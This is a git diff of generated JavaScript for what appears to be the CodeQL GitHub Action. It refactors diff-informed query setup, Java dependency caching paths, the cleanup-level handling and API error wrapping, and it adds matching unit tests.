{"version":3,"file":"analyze-action-post.js","sourceRoot":"","sources":["../src/analyze-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,qCAAqC;AACrC,iDAA2C;AAC3C,kEAAoD;AACpD,+CAAuC;AACvC,uCAAwD;AACxD,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,IAAI,CAAC;QACH,WAAW,CAAC,aAAa,EAAE,CAAC;QAC5B,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;QAClC,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,kFAAkF;QAClF,wFAAwF;QACxF,IAAI,OAAO,CAAC,GAAG,CAAC,oBAAM,CAAC,mBAAmB,CAAC,KAAK,MAAM,EAAE,CAAC;YACvD,MAAM,MAAM,GAAG,MAAM,IAAA,wBAAS,EAC5B,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;YACF,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;gBACzB,MAAM,MAAM,GAAG,MAAM,IAAA,kBAAS,EAAC,MAAM,CAAC,SAAS,CAAC,CAAC;gBACjD,MAAM,OAAO,GAAG,MAAM,MAAM,CAAC,UAAU,EAAE,CAAC;gBAC1C,MAAM,IAAA,mBAAS,EAAC,yCAAyC,EAAE,GAAG,EAAE,CAC9D,cAAc,CAAC,4BAA4B,CACzC,MAAM,EACN,MAAM,CAAC,aAAa,CAAC,IAAI,EACzB,OAAO,CAAC,OAAO,CAChB,CACF,CAAC;YACJ,CAAC;QACH,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,IAAI,CAAC,SAAS,CACZ,oCAAoC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CAC7D,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
{"version":3,"file":"analyze-action-post.js","sourceRoot":"","sources":["../src/analyze-action-post.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAAA;;;;GAIG;AACH,uCAAyB;AAEzB,oDAAsC;AAEtC,4DAA8C;AAC9C,6CAAgD;AAChD,qCAAqC;AACrC,iDAA2C;AAC3C,kEAAoD;AACpD,6DAAgE;AAChE,+CAAuC;AACvC,uCAA6C;AAC7C,iCAAoE;AAEpE,KAAK,UAAU,UAAU;IACvB,IAAI,CAAC;QACH,WAAW,CAAC,aAAa,EAAE,CAAC;QAC5B,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;QAClC,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,kFAAkF;QAClF,wFAAwF;QACxF,IAAI,OAAO,CAAC,GAAG,CAAC,oBAAM,CAAC,mBAAmB,CAAC,KAAK,MAAM,EAAE,CAAC;YACvD,MAAM,MAAM,GAAG,MAAM,IAAA,wBAAS,EAC5B,WAAW,CAAC,qBAAqB,EAAE,EACnC,MAAM,CACP,CAAC;YACF,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;gBACzB,MAAM,MAAM,GAAG,MAAM,IAAA,kBAAS,EAAC,MAAM,CAAC,SAAS,CAAC,CAAC;gBACjD,MAAM,OAAO,GAAG,MAAM,MAAM,CAAC,UAAU,EAAE,CAAC;gBAC1C,MAAM,cAAc,CAAC,4BAA4B,CAC/C,MAAM,EACN,MAAM,CAAC,aAAa,CAAC,IAAI,EACzB,OAAO,CAAC,OAAO,CAChB,CAAC;YACJ,CAAC;QACH,CAAC;QAED,+EAA+E;QAC/E,4EAA4E;QAC5E,+BAA+B;QAC/B,MAAM,qBAAqB,GAAG,IAAA,6CAAwB,GAAE,CAAC;QACzD,IAAI,EAAE,CAAC,UAAU,CAAC,qBAAqB,CAAC,EAAE,CAAC;YACzC,IAAI,CAAC;gBACH,EAAE,CAAC,MAAM,CAAC,qBAAqB,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;YACxD,CAAC;YAAC,OAAO,KAAK,EAAE,CAAC;gBACf,MAAM,CAAC,IAAI,CACT,2DAA2D,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CACpF,CAAC;YACJ,CAAC;QACH,CAAC;IACH,CAAC;IAAC,OAAO,KAAK,EAAE,CAAC;QACf,IAAI,CAAC,SAAS,CACZ,oCAAoC,IAAA,sBAAe,EAAC,KAAK,CAAC,EAAE,CAC7D,CAAC;IACJ,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
||||||
20
lib/analyze-action.js
generated
20
lib/analyze-action.js
generated
@@ -41,7 +41,6 @@ const fs = __importStar(require("fs"));
|
|||||||
const path_1 = __importDefault(require("path"));
|
const path_1 = __importDefault(require("path"));
|
||||||
const perf_hooks_1 = require("perf_hooks");
|
const perf_hooks_1 = require("perf_hooks");
|
||||||
const core = __importStar(require("@actions/core"));
|
const core = __importStar(require("@actions/core"));
|
||||||
const github = __importStar(require("@actions/github"));
|
|
||||||
const actionsUtil = __importStar(require("./actions-util"));
|
const actionsUtil = __importStar(require("./actions-util"));
|
||||||
const analyze_1 = require("./analyze");
|
const analyze_1 = require("./analyze");
|
||||||
const api_client_1 = require("./api-client");
|
const api_client_1 = require("./api-client");
|
||||||
@@ -51,6 +50,7 @@ const codeql_1 = require("./codeql");
|
|||||||
const config_utils_1 = require("./config-utils");
|
const config_utils_1 = require("./config-utils");
|
||||||
const database_upload_1 = require("./database-upload");
|
const database_upload_1 = require("./database-upload");
|
||||||
const dependency_caching_1 = require("./dependency-caching");
|
const dependency_caching_1 = require("./dependency-caching");
|
||||||
|
const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const feature_flags_1 = require("./feature-flags");
|
const feature_flags_1 = require("./feature-flags");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
@@ -189,22 +189,24 @@ async function run() {
|
|||||||
const outputDir = actionsUtil.getRequiredInput("output");
|
const outputDir = actionsUtil.getRequiredInput("output");
|
||||||
core.exportVariable(environment_1.EnvVar.SARIF_RESULTS_OUTPUT_DIR, outputDir);
|
core.exportVariable(environment_1.EnvVar.SARIF_RESULTS_OUTPUT_DIR, outputDir);
|
||||||
const threads = util.getThreadsFlag(actionsUtil.getOptionalInput("threads") || process.env["CODEQL_THREADS"], logger);
|
const threads = util.getThreadsFlag(actionsUtil.getOptionalInput("threads") || process.env["CODEQL_THREADS"], logger);
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
||||||
util.checkActionVersion(actionsUtil.getActionVersion(), gitHubVersion);
|
util.checkActionVersion(actionsUtil.getActionVersion(), gitHubVersion);
|
||||||
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, actionsUtil.getTemporaryDirectory(), logger);
|
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, actionsUtil.getTemporaryDirectory(), logger);
|
||||||
const memory = util.getMemoryFlag(actionsUtil.getOptionalInput("ram") || process.env["CODEQL_RAM"], logger);
|
const memory = util.getMemoryFlag(actionsUtil.getOptionalInput("ram") || process.env["CODEQL_RAM"], logger);
|
||||||
const pull_request = github.context.payload.pull_request;
|
const branches = await (0, diff_informed_analysis_utils_1.getDiffInformedAnalysisBranches)(codeql, features, logger);
|
||||||
const diffRangePackDir = pull_request &&
|
const diffRangePackDir = branches
|
||||||
(await (0, analyze_1.setupDiffInformedQueryRun)(pull_request.base.ref, pull_request.head.label, codeql, logger, features));
|
? await (0, analyze_1.setupDiffInformedQueryRun)(branches, logger)
|
||||||
|
: undefined;
|
||||||
await (0, analyze_1.warnIfGoInstalledAfterInit)(config, logger);
|
await (0, analyze_1.warnIfGoInstalledAfterInit)(config, logger);
|
||||||
await runAutobuildIfLegacyGoWorkflow(config, logger);
|
await runAutobuildIfLegacyGoWorkflow(config, logger);
|
||||||
dbCreationTimings = await (0, analyze_1.runFinalize)(outputDir, threads, memory, codeql, config, logger);
|
dbCreationTimings = await (0, analyze_1.runFinalize)(outputDir, threads, memory, codeql, config, logger);
|
||||||
|
const cleanupLevel = actionsUtil.getOptionalInput("cleanup-level") || "brutal";
|
||||||
if (actionsUtil.getRequiredInput("skip-queries") !== "true") {
|
if (actionsUtil.getRequiredInput("skip-queries") !== "true") {
|
||||||
runStats = await (0, analyze_1.runQueries)(outputDir, memory, util.getAddSnippetsFlag(actionsUtil.getRequiredInput("add-snippets")), threads, diffRangePackDir, actionsUtil.getOptionalInput("category"), config, logger, features);
|
runStats = await (0, analyze_1.runQueries)(outputDir, memory, util.getAddSnippetsFlag(actionsUtil.getRequiredInput("add-snippets")), threads, cleanupLevel, diffRangePackDir, actionsUtil.getOptionalInput("category"), config, logger, features);
|
||||||
}
|
}
|
||||||
if (actionsUtil.getOptionalInput("cleanup-level") !== "none") {
|
if (cleanupLevel !== "none") {
|
||||||
await (0, analyze_1.runCleanup)(config, actionsUtil.getOptionalInput("cleanup-level") || "brutal", logger);
|
await (0, analyze_1.runCleanup)(config, cleanupLevel, logger);
|
||||||
}
|
}
|
||||||
const dbLocations = {};
|
const dbLocations = {};
|
||||||
for (const language of config.languages) {
|
for (const language of config.languages) {
|
||||||
@@ -238,7 +240,7 @@ async function run() {
|
|||||||
}
|
}
|
||||||
else if (uploadResult !== undefined &&
|
else if (uploadResult !== undefined &&
|
||||||
actionsUtil.getRequiredInput("wait-for-processing") === "true") {
|
actionsUtil.getRequiredInput("wait-for-processing") === "true") {
|
||||||
await uploadLib.waitForProcessing((0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY")), uploadResult.sarifID, (0, logging_1.getActionsLogger)());
|
await uploadLib.waitForProcessing((0, repository_1.getRepositoryNwo)(), uploadResult.sarifID, (0, logging_1.getActionsLogger)());
|
||||||
}
|
}
|
||||||
// If we did not throw an error yet here, but we expect one, throw it.
|
// If we did not throw an error yet here, but we expect one, throw it.
|
||||||
if (actionsUtil.getOptionalInput("expect-error") === "true") {
|
if (actionsUtil.getOptionalInput("expect-error") === "true") {
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
76
lib/analyze.js
generated
76
lib/analyze.js
generated
@@ -54,11 +54,14 @@ const actionsUtil = __importStar(require("./actions-util"));
|
|||||||
const api_client_1 = require("./api-client");
|
const api_client_1 = require("./api-client");
|
||||||
const autobuild_1 = require("./autobuild");
|
const autobuild_1 = require("./autobuild");
|
||||||
const codeql_1 = require("./codeql");
|
const codeql_1 = require("./codeql");
|
||||||
|
const dependency_caching_1 = require("./dependency-caching");
|
||||||
const diagnostics_1 = require("./diagnostics");
|
const diagnostics_1 = require("./diagnostics");
|
||||||
|
const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const feature_flags_1 = require("./feature-flags");
|
const feature_flags_1 = require("./feature-flags");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
const logging_1 = require("./logging");
|
const logging_1 = require("./logging");
|
||||||
|
const repository_1 = require("./repository");
|
||||||
const tools_features_1 = require("./tools-features");
|
const tools_features_1 = require("./tools-features");
|
||||||
const tracer_config_1 = require("./tracer-config");
|
const tracer_config_1 = require("./tracer-config");
|
||||||
const upload_lib_1 = require("./upload-lib");
|
const upload_lib_1 = require("./upload-lib");
|
||||||
@@ -101,6 +104,14 @@ async function runExtraction(codeql, config, logger) {
|
|||||||
config.buildMode === util_1.BuildMode.Autobuild) {
|
config.buildMode === util_1.BuildMode.Autobuild) {
|
||||||
await (0, autobuild_1.setupCppAutobuild)(codeql, logger);
|
await (0, autobuild_1.setupCppAutobuild)(codeql, logger);
|
||||||
}
|
}
|
||||||
|
// The Java `build-mode: none` extractor places dependencies (.jar files) in the
|
||||||
|
// database scratch directory by default. For dependency caching purposes, we want
|
||||||
|
// a stable path that caches can be restored into and that we can cache at the
|
||||||
|
// end of the workflow (i.e. that does not get removed when the scratch directory is).
|
||||||
|
if (language === languages_1.Language.java && config.buildMode === util_1.BuildMode.None) {
|
||||||
|
process.env["CODEQL_EXTRACTOR_JAVA_OPTION_BUILDLESS_DEPENDENCY_DIR"] =
|
||||||
|
(0, dependency_caching_1.getJavaTempDependencyDir)();
|
||||||
|
}
|
||||||
await codeql.extractUsingBuildMode(config, language);
|
await codeql.extractUsingBuildMode(config, language);
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
@@ -151,21 +162,13 @@ async function finalizeDatabaseCreation(codeql, config, threadsFlag, memoryFlag,
|
|||||||
/**
|
/**
|
||||||
* Set up the diff-informed analysis feature.
|
* Set up the diff-informed analysis feature.
|
||||||
*
|
*
|
||||||
* @param baseRef The base branch name, used for calculating the diff range.
|
|
||||||
* @param headLabel The label that uniquely identifies the head branch across
|
|
||||||
* repositories, used for calculating the diff range.
|
|
||||||
* @param codeql
|
|
||||||
* @param logger
|
|
||||||
* @param features
|
|
||||||
* @returns Absolute path to the directory containing the extension pack for
|
* @returns Absolute path to the directory containing the extension pack for
|
||||||
* the diff range information, or `undefined` if the feature is disabled.
|
* the diff range information, or `undefined` if the feature is disabled.
|
||||||
*/
|
*/
|
||||||
async function setupDiffInformedQueryRun(baseRef, headLabel, codeql, logger, features) {
|
async function setupDiffInformedQueryRun(branches, logger) {
|
||||||
if (!(await features.getValue(feature_flags_1.Feature.DiffInformedQueries, codeql))) {
|
|
||||||
return undefined;
|
|
||||||
}
|
|
||||||
return await (0, logging_1.withGroupAsync)("Generating diff range extension pack", async () => {
|
return await (0, logging_1.withGroupAsync)("Generating diff range extension pack", async () => {
|
||||||
const diffRanges = await getPullRequestEditedDiffRanges(baseRef, headLabel, logger);
|
logger.info(`Calculating diff ranges for ${branches.base}...${branches.head}`);
|
||||||
|
const diffRanges = await getPullRequestEditedDiffRanges(branches, logger);
|
||||||
const packDir = writeDiffRangeDataExtensionPack(logger, diffRanges);
|
const packDir = writeDiffRangeDataExtensionPack(logger, diffRanges);
|
||||||
if (packDir === undefined) {
|
if (packDir === undefined) {
|
||||||
logger.warning("Cannot create diff range extension pack for diff-informed queries; " +
|
logger.warning("Cannot create diff range extension pack for diff-informed queries; " +
|
||||||
@@ -180,17 +183,15 @@ async function setupDiffInformedQueryRun(baseRef, headLabel, codeql, logger, fea
|
|||||||
/**
|
/**
|
||||||
* Return the file line ranges that were added or modified in the pull request.
|
* Return the file line ranges that were added or modified in the pull request.
|
||||||
*
|
*
|
||||||
* @param baseRef The base branch name, used for calculating the diff range.
|
* @param branches The base and head branches of the pull request.
|
||||||
* @param headLabel The label that uniquely identifies the head branch across
|
|
||||||
* repositories, used for calculating the diff range.
|
|
||||||
* @param logger
|
* @param logger
|
||||||
* @returns An array of tuples, where each tuple contains the absolute path of a
|
* @returns An array of tuples, where each tuple contains the absolute path of a
|
||||||
* file, the start line and the end line (both 1-based and inclusive) of an
|
* file, the start line and the end line (both 1-based and inclusive) of an
|
||||||
* added or modified range in that file. Returns `undefined` if the action was
|
* added or modified range in that file. Returns `undefined` if the action was
|
||||||
* not triggered by a pull request or if there was an error.
|
* not triggered by a pull request or if there was an error.
|
||||||
*/
|
*/
|
||||||
async function getPullRequestEditedDiffRanges(baseRef, headLabel, logger) {
|
async function getPullRequestEditedDiffRanges(branches, logger) {
|
||||||
const fileDiffs = await getFileDiffsWithBasehead(baseRef, headLabel, logger);
|
const fileDiffs = await getFileDiffsWithBasehead(branches, logger);
|
||||||
if (fileDiffs === undefined) {
|
if (fileDiffs === undefined) {
|
||||||
return undefined;
|
return undefined;
|
||||||
}
|
}
|
||||||
@@ -213,15 +214,15 @@ async function getPullRequestEditedDiffRanges(baseRef, headLabel, logger) {
|
|||||||
}
|
}
|
||||||
return results;
|
return results;
|
||||||
}
|
}
|
||||||
async function getFileDiffsWithBasehead(baseRef, headLabel, logger) {
|
async function getFileDiffsWithBasehead(branches, logger) {
|
||||||
const ownerRepo = util.getRequiredEnvParam("GITHUB_REPOSITORY").split("/");
|
// Check CODE_SCANNING_REPOSITORY first. If it is empty or not set, fall back
|
||||||
const owner = ownerRepo[0];
|
// to GITHUB_REPOSITORY.
|
||||||
const repo = ownerRepo[1];
|
const repositoryNwo = (0, repository_1.getRepositoryNwoFromEnv)("CODE_SCANNING_REPOSITORY", "GITHUB_REPOSITORY");
|
||||||
const basehead = `${baseRef}...${headLabel}`;
|
const basehead = `${branches.base}...${branches.head}`;
|
||||||
try {
|
try {
|
||||||
const response = await (0, api_client_1.getApiClient)().rest.repos.compareCommitsWithBasehead({
|
const response = await (0, api_client_1.getApiClient)().rest.repos.compareCommitsWithBasehead({
|
||||||
owner,
|
owner: repositoryNwo.owner,
|
||||||
repo,
|
repo: repositoryNwo.repo,
|
||||||
basehead,
|
basehead,
|
||||||
per_page: 1,
|
per_page: 1,
|
||||||
});
|
});
|
||||||
@@ -333,6 +334,14 @@ function writeDiffRangeDataExtensionPack(logger, ranges) {
|
|||||||
if (ranges === undefined) {
|
if (ranges === undefined) {
|
||||||
return undefined;
|
return undefined;
|
||||||
}
|
}
|
||||||
|
if (ranges.length === 0) {
|
||||||
|
// An empty diff range means that there are no added or modified lines in
|
||||||
|
// the pull request. But the `restrictAlertsTo` extensible predicate
|
||||||
|
// interprets an empty data extension differently, as an indication that
|
||||||
|
// all alerts should be included. So we need to specifically set the diff
|
||||||
|
// range to a non-empty list that cannot match any alert location.
|
||||||
|
ranges = [{ path: "", startLine: 0, endLine: 0 }];
|
||||||
|
}
|
||||||
const diffRangeDir = path.join(actionsUtil.getTemporaryDirectory(), "pr-diff-range");
|
const diffRangeDir = path.join(actionsUtil.getTemporaryDirectory(), "pr-diff-range");
|
||||||
fs.mkdirSync(diffRangeDir);
|
fs.mkdirSync(diffRangeDir);
|
||||||
fs.writeFileSync(path.join(diffRangeDir, "qlpack.yml"), `
|
fs.writeFileSync(path.join(diffRangeDir, "qlpack.yml"), `
|
||||||
@@ -349,6 +358,7 @@ extensions:
|
|||||||
- addsTo:
|
- addsTo:
|
||||||
pack: codeql/util
|
pack: codeql/util
|
||||||
extensible: restrictAlertsTo
|
extensible: restrictAlertsTo
|
||||||
|
checkPresence: false
|
||||||
data:
|
data:
|
||||||
`;
|
`;
|
||||||
let data = ranges
|
let data = ranges
|
||||||
@@ -368,23 +378,27 @@ extensions:
|
|||||||
const extensionFilePath = path.join(diffRangeDir, "pr-diff-range.yml");
|
const extensionFilePath = path.join(diffRangeDir, "pr-diff-range.yml");
|
||||||
fs.writeFileSync(extensionFilePath, extensionContents);
|
fs.writeFileSync(extensionFilePath, extensionContents);
|
||||||
logger.debug(`Wrote pr-diff-range extension pack to ${extensionFilePath}:\n${extensionContents}`);
|
logger.debug(`Wrote pr-diff-range extension pack to ${extensionFilePath}:\n${extensionContents}`);
|
||||||
|
// Write the diff ranges to a JSON file, for action-side alert filtering by the
|
||||||
|
// upload-lib module.
|
||||||
|
(0, diff_informed_analysis_utils_1.writeDiffRangesJsonFile)(logger, ranges);
|
||||||
return diffRangeDir;
|
return diffRangeDir;
|
||||||
}
|
}
|
||||||
// Runs queries and creates sarif files in the given folder
|
// Runs queries and creates sarif files in the given folder
|
||||||
async function runQueries(sarifFolder, memoryFlag, addSnippetsFlag, threadsFlag, diffRangePackDir, automationDetailsId, config, logger, features) {
|
async function runQueries(sarifFolder, memoryFlag, addSnippetsFlag, threadsFlag, cleanupLevel, diffRangePackDir, automationDetailsId, config, logger, features) {
|
||||||
const statusReport = {};
|
const statusReport = {};
|
||||||
|
const queryFlags = [memoryFlag, threadsFlag];
|
||||||
|
if (cleanupLevel !== "overlay") {
|
||||||
|
queryFlags.push("--expect-discarded-cache");
|
||||||
|
}
|
||||||
statusReport.analysis_is_diff_informed = diffRangePackDir !== undefined;
|
statusReport.analysis_is_diff_informed = diffRangePackDir !== undefined;
|
||||||
const dataExtensionFlags = diffRangePackDir
|
if (diffRangePackDir) {
|
||||||
? [
|
queryFlags.push(`--additional-packs=${diffRangePackDir}`);
|
||||||
`--additional-packs=${diffRangePackDir}`,
|
queryFlags.push("--extension-packs=codeql-action/pr-diff-range");
|
||||||
"--extension-packs=codeql-action/pr-diff-range",
|
}
|
||||||
]
|
|
||||||
: [];
|
|
||||||
const sarifRunPropertyFlag = diffRangePackDir
|
const sarifRunPropertyFlag = diffRangePackDir
|
||||||
? "--sarif-run-property=incrementalMode=diff-informed"
|
? "--sarif-run-property=incrementalMode=diff-informed"
|
||||||
: undefined;
|
: undefined;
|
||||||
const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
|
const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
|
||||||
const queryFlags = [memoryFlag, threadsFlag, ...dataExtensionFlags];
|
|
||||||
for (const language of config.languages) {
|
for (const language of config.languages) {
|
||||||
try {
|
try {
|
||||||
const sarifFile = path.join(sarifFolder, `${language}.sarif`);
|
const sarifFile = path.join(sarifFolder, `${language}.sarif`);
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
2
lib/analyze.test.js
generated
2
lib/analyze.test.js
generated
@@ -114,7 +114,7 @@ const util = __importStar(require("./util"));
|
|||||||
fs.mkdirSync(util.getCodeQLDatabasePath(config, language), {
|
fs.mkdirSync(util.getCodeQLDatabasePath(config, language), {
|
||||||
recursive: true,
|
recursive: true,
|
||||||
});
|
});
|
||||||
const statusReport = await (0, analyze_1.runQueries)(tmpDir, memoryFlag, addSnippetsFlag, threadsFlag, undefined, undefined, config, (0, logging_1.getRunnerLogger)(true), (0, testing_utils_1.createFeatures)([feature_flags_1.Feature.QaTelemetryEnabled]));
|
const statusReport = await (0, analyze_1.runQueries)(tmpDir, memoryFlag, addSnippetsFlag, threadsFlag, "brutal", undefined, undefined, config, (0, logging_1.getRunnerLogger)(true), (0, testing_utils_1.createFeatures)([feature_flags_1.Feature.QaTelemetryEnabled]));
|
||||||
t.deepEqual(Object.keys(statusReport).sort(), [
|
t.deepEqual(Object.keys(statusReport).sort(), [
|
||||||
"analysis_is_diff_informed",
|
"analysis_is_diff_informed",
|
||||||
`analyze_builtin_queries_${language}_duration_ms`,
|
`analyze_builtin_queries_${language}_duration_ms`,
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
21
lib/api-client.js
generated
21
lib/api-client.js
generated
@@ -122,14 +122,12 @@ async function getGitHubVersion() {
|
|||||||
* Get the path of the currently executing workflow relative to the repository root.
|
* Get the path of the currently executing workflow relative to the repository root.
|
||||||
*/
|
*/
|
||||||
async function getWorkflowRelativePath() {
|
async function getWorkflowRelativePath() {
|
||||||
const repo_nwo = (0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY").split("/");
|
const repo_nwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const owner = repo_nwo[0];
|
|
||||||
const repo = repo_nwo[1];
|
|
||||||
const run_id = Number((0, util_1.getRequiredEnvParam)("GITHUB_RUN_ID"));
|
const run_id = Number((0, util_1.getRequiredEnvParam)("GITHUB_RUN_ID"));
|
||||||
const apiClient = getApiClient();
|
const apiClient = getApiClient();
|
||||||
const runsResponse = await apiClient.request("GET /repos/:owner/:repo/actions/runs/:run_id?exclude_pull_requests=true", {
|
const runsResponse = await apiClient.request("GET /repos/:owner/:repo/actions/runs/:run_id?exclude_pull_requests=true", {
|
||||||
owner,
|
owner: repo_nwo.owner,
|
||||||
repo,
|
repo: repo_nwo.repo,
|
||||||
run_id,
|
run_id,
|
||||||
});
|
});
|
||||||
const workflowUrl = runsResponse.data.workflow_url;
|
const workflowUrl = runsResponse.data.workflow_url;
|
||||||
@@ -187,7 +185,7 @@ function computeAutomationID(analysis_key, environment) {
|
|||||||
}
|
}
|
||||||
/** List all Actions cache entries matching the provided key and ref. */
|
/** List all Actions cache entries matching the provided key and ref. */
|
||||||
async function listActionsCaches(key, ref) {
|
async function listActionsCaches(key, ref) {
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
return await getApiClient().paginate("GET /repos/{owner}/{repo}/actions/caches", {
|
return await getApiClient().paginate("GET /repos/{owner}/{repo}/actions/caches", {
|
||||||
owner: repositoryNwo.owner,
|
owner: repositoryNwo.owner,
|
||||||
repo: repositoryNwo.repo,
|
repo: repositoryNwo.repo,
|
||||||
@@ -197,7 +195,7 @@ async function listActionsCaches(key, ref) {
|
|||||||
}
|
}
|
||||||
/** Delete an Actions cache item by its ID. */
|
/** Delete an Actions cache item by its ID. */
|
||||||
async function deleteActionsCache(id) {
|
async function deleteActionsCache(id) {
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
await getApiClient().rest.actions.deleteActionsCacheById({
|
await getApiClient().rest.actions.deleteActionsCacheById({
|
||||||
owner: repositoryNwo.owner,
|
owner: repositoryNwo.owner,
|
||||||
repo: repositoryNwo.repo,
|
repo: repositoryNwo.repo,
|
||||||
@@ -206,11 +204,16 @@ async function deleteActionsCache(id) {
|
|||||||
}
|
}
|
||||||
function wrapApiConfigurationError(e) {
|
function wrapApiConfigurationError(e) {
|
||||||
if ((0, util_1.isHTTPError)(e)) {
|
if ((0, util_1.isHTTPError)(e)) {
|
||||||
if (e.message.includes("API rate limit exceeded for site ID installation") ||
|
if (e.message.includes("API rate limit exceeded for installation") ||
|
||||||
e.message.includes("commit not found") ||
|
e.message.includes("commit not found") ||
|
||||||
/^ref .* not found in this repository$/.test(e.message)) {
|
e.message.includes("Resource not accessible by integration") ||
|
||||||
|
/ref .* not found in this repository/.test(e.message)) {
|
||||||
return new util_1.ConfigurationError(e.message);
|
return new util_1.ConfigurationError(e.message);
|
||||||
}
|
}
|
||||||
|
else if (e.message.includes("Bad credentials") ||
|
||||||
|
e.message.includes("Not Found")) {
|
||||||
|
return new util_1.ConfigurationError("Please check that your token is valid and has the required permissions: contents: read, security-events: write");
|
||||||
|
}
|
||||||
}
|
}
|
||||||
return e;
|
return e;
|
||||||
}
|
}
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
36
lib/api-client.test.js
generated
36
lib/api-client.test.js
generated
@@ -120,4 +120,40 @@ function mockGetMetaVersionHeader(versionHeader) {
|
|||||||
});
|
});
|
||||||
t.deepEqual({ type: util.GitHubVariant.GHE_DOTCOM }, gheDotcom);
|
t.deepEqual({ type: util.GitHubVariant.GHE_DOTCOM }, gheDotcom);
|
||||||
});
|
});
|
||||||
|
(0, ava_1.default)("wrapApiConfigurationError correctly wraps specific configuration errors", (t) => {
|
||||||
|
// We don't reclassify arbitrary errors
|
||||||
|
const arbitraryError = new Error("arbitrary error");
|
||||||
|
let res = api.wrapApiConfigurationError(arbitraryError);
|
||||||
|
t.is(res, arbitraryError);
|
||||||
|
// Same goes for arbitrary errors
|
||||||
|
const configError = new util.ConfigurationError("arbitrary error");
|
||||||
|
res = api.wrapApiConfigurationError(configError);
|
||||||
|
t.is(res, configError);
|
||||||
|
// If an HTTP error doesn't contain a specific error message, we don't
|
||||||
|
// wrap is an an API error.
|
||||||
|
const httpError = new util.HTTPError("arbitrary HTTP error", 456);
|
||||||
|
res = api.wrapApiConfigurationError(httpError);
|
||||||
|
t.is(res, httpError);
|
||||||
|
// For other HTTP errors, we wrap them as Configuration errors if they contain
|
||||||
|
// specific error messages.
|
||||||
|
const httpNotFoundError = new util.HTTPError("commit not found", 404);
|
||||||
|
res = api.wrapApiConfigurationError(httpNotFoundError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError("commit not found"));
|
||||||
|
const refNotFoundError = new util.HTTPError("ref 'refs/heads/jitsi' not found in this repository - https://docs.github.com/rest", 404);
|
||||||
|
res = api.wrapApiConfigurationError(refNotFoundError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError("ref 'refs/heads/jitsi' not found in this repository - https://docs.github.com/rest"));
|
||||||
|
const apiRateLimitError = new util.HTTPError("API rate limit exceeded for installation", 403);
|
||||||
|
res = api.wrapApiConfigurationError(apiRateLimitError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError("API rate limit exceeded for installation"));
|
||||||
|
const tokenSuggestionMessage = "Please check that your token is valid and has the required permissions: contents: read, security-events: write";
|
||||||
|
const badCredentialsError = new util.HTTPError("Bad credentials", 401);
|
||||||
|
res = api.wrapApiConfigurationError(badCredentialsError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError(tokenSuggestionMessage));
|
||||||
|
const notFoundError = new util.HTTPError("Not Found", 404);
|
||||||
|
res = api.wrapApiConfigurationError(notFoundError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError(tokenSuggestionMessage));
|
||||||
|
const resourceNotAccessibleError = new util.HTTPError("Resource not accessible by integration", 403);
|
||||||
|
res = api.wrapApiConfigurationError(resourceNotAccessibleError);
|
||||||
|
t.deepEqual(res, new util.ConfigurationError("Resource not accessible by integration"));
|
||||||
|
});
|
||||||
